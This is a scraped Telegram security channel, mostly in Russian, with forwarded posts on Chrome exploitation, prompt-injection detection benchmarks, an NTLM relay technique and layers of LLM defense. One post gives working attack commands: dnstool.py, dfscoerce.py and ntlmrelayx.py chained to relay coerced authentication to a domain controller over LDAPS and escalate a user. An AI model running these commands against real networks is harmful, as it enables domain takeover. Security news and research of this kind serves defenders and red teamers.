Zeropticum🫡 – Telegram
Zeropticum🫡
120 subscribers
106 photos
5 videos
30 files
262 links
Make security greate again!

Contact - @ArtemiyUeax
Download Telegram
Forwarded from OPERATION ZERO RU
101 Chrome Exploitation — Part 1: Architecture

Опубликовали новую статью по эксплуатации Chrome. В ней описана архитектура браузера, его основные компоненты (движок рендеринга Blink, движок JavaScript V8, сетевой стек), а также упражнение, в котором читатели добавят свою функцию в API Blink. Приятного чтения.

https://opzero.ru/press/101-chrome-exploitation-part-1-architecture/
🔥1🤯1
Forwarded from CyberSecurityTechnologies
web_agents_inject.pdf
5.6 MB
#AIOps
#MLSecOps
"WAInjectBench: Benchmarking Prompt Injection Detections for Web Agents", 2025.
]-> Comprehensive benchmark for prompt injection detection in web agents

// we presenting the first comprehensive benchmark study on detecting prompt injection attacks targeting web agents. We construct datasets containing both malicious and benign samples: malicious text segments generated by different attacks, benign text segments from four categories, malicious images produced by attacks, and benign images from two categories
WAVSEP - это уязвимое веб-приложение, разработанное для оценки возможностей, качества и точности сканеров уязвимостей веб-приложений.
Содержит коллекцию уникальных уязвимых веб-страниц, которые можно использовать для тестирования различных свойств сканеров веб-приложений. 2015 год...

https://github.com/sectooladdict/wavsep
CrossGuard: Safeguarding MLLMs against Joint-Modal Implicit Malicious Attacks
https://github.com/AI45Lab/MLLMGuard
Forwarded from Proxy Bar
CVE-2025-59287
*
WSUS Remote Code Execution

writeUp + POC
Forwarded from RedTeam brazzers (Миша)
Всем привет!

А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )

Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так: echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.

Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )

Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
1
Список инструментов, статей и ресурсов, которые используют большие языковые модели (LLM) для обратного проектирования (RE), декомпиляции, бинарного анализа и исследований в области кибербезопасности.

https://github.com/ram-elgov/awesome-llm-reverse-engineering
Где же ты была раньше...
Следующий шаг - Джарвис...
Forwarded from GitHub Community
This media is not supported in your browser
VIEW IN TELEGRAM
Papiers — переводчик научного на человеческий

Берёт сложные научные статьи и превращает их:

— в ясный конспект
— с выводами, графами, заметками
— с темами и ссылками на обсуждения


Юзаем здесь

🐱 GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Привет, осинтерам!
Forwarded from PWN AI (Artyom Semenov)
5 уровней защиты генеративного ИИ в современном мире.

Если вы считаете, что атаки для LLM классифицируют только регулярными выражениями, то вы живёте в 2023 году. Ведь с того времени подходов и идей к реализации защитных механизмов появилось достаточно много. Я решил поделить на 5 ключевых уровней – от того, что реализуется в модели до того, что делают уже на этапах эксплуатации модели.

1. Alignment. Выравнивание модели в соответствии с соображениями безопасности – является основой. Раньше в индустрии применялся подход SFT (Supervised Fine-Tuning)(когда дообучаются на заранее размеченных данных, применяемых к конкретной задаче) теперь применяется – обучение с подкреплением и Direct Preference Optimization – чтобы вероятность ответа “positive” была выше. Anthropic пошёл ещё дальше. Их модель сама генерирует синтетические данные для обучения, критикуя собственные ответы на основе «Конституции» (набора правил), снижая зависимость от человеческой разметки.

2. Контроль за представлениями модели. Суть в том, что на этом уровне мы работаем уже с весами модели. Тут мы можем непосредственно контролировать внутренние активации модели, которые могут отвечать за «ложь», «манипуляции» или «жажду власти» - интерпретируя поведение модели. Для этого используется метод Linear Artifical Tomography – путём отправки в модель примеров (правды/лжи или пользы/вреда).

Также на этом уровне появляется подход – Circuit Breakers, который буквально вмешивается в скрытые состояния модели/процесс её размышлений и корректирует состояние размышлений с небезопасных на безопасные/доверенные/не содержащих признаков следования джейлбрейку (если тот был подан на вход). У Anthropic есть инструмент по этому вопросу.

Ну и не стоит забывать про то, что модель можно разучить небезопасным вещам, без необходимости полного переобучения с нуля. Об этом в целом говорит подход Machine Unlearning. В подходе применяют градиентные методы, направленные на уменьшение уверенности модели в нежелательных ответах, например, через градиентный спуск по лоссу на «забываемых» данных или специализированные методы вроде influence unlearning.

3. Системные инструкции. Уже известный всем метод, суть в том, что вы ограничиваете взаимодействие модели с небезопасным, определяя изначально системный промпт. Тут можно отметить несколько подходов для реализации.

Например, внедрение иерархии инструкций, где системный промпт имеет приоритет над пользовательским (как это есть у OpenAI), а также использование специальных токенов типа <|start_header_id|>system для разделения контекста. Известно также что системные промпты Claude 3 включают сложные инструкции для конструктивного отказа без нравоучений пользователя. Делается это для того, чтобы избежать эффекта ложных отказов от ответа.

4. Гардрейлы. На входе, на выходе и в зависимости от контекста – эти инструменты классифицируют небезопасные данные. Делают это они не всегда эффективно, а зачастую и сами могут быть атакованы. Но всё-же используются. Гардрейлы позволяют контролировать цепочки диалогов, конкретные темы для разговора, а в некоторых случаях успешно справляются с атаками через невидимые символы и прочее. Важно понимать, что в большинстве случаев гардрейлом выступает либо другая LLM-модель (ShieldGemma, Llama Guard 3) либо же bert-based классификатор.

5. Red Teaming. Наилучшая защита, как известно – это нападение. Редтимеры уже изобрели большое количество инструментов, датасетов для тестирования, а также если смотреть на MITRE Atlas – техник и тактик для реализации атак. Может быть, даже такое что перед релизом модели приглашают экспертов в узких доменах (биология, оружие, кибербезопасность) – для того, чтобы они тестировали модель на возможный небезопасный вывод. Как это к примеру делают в рамках Preparedness Framework от OpenAI.
👍1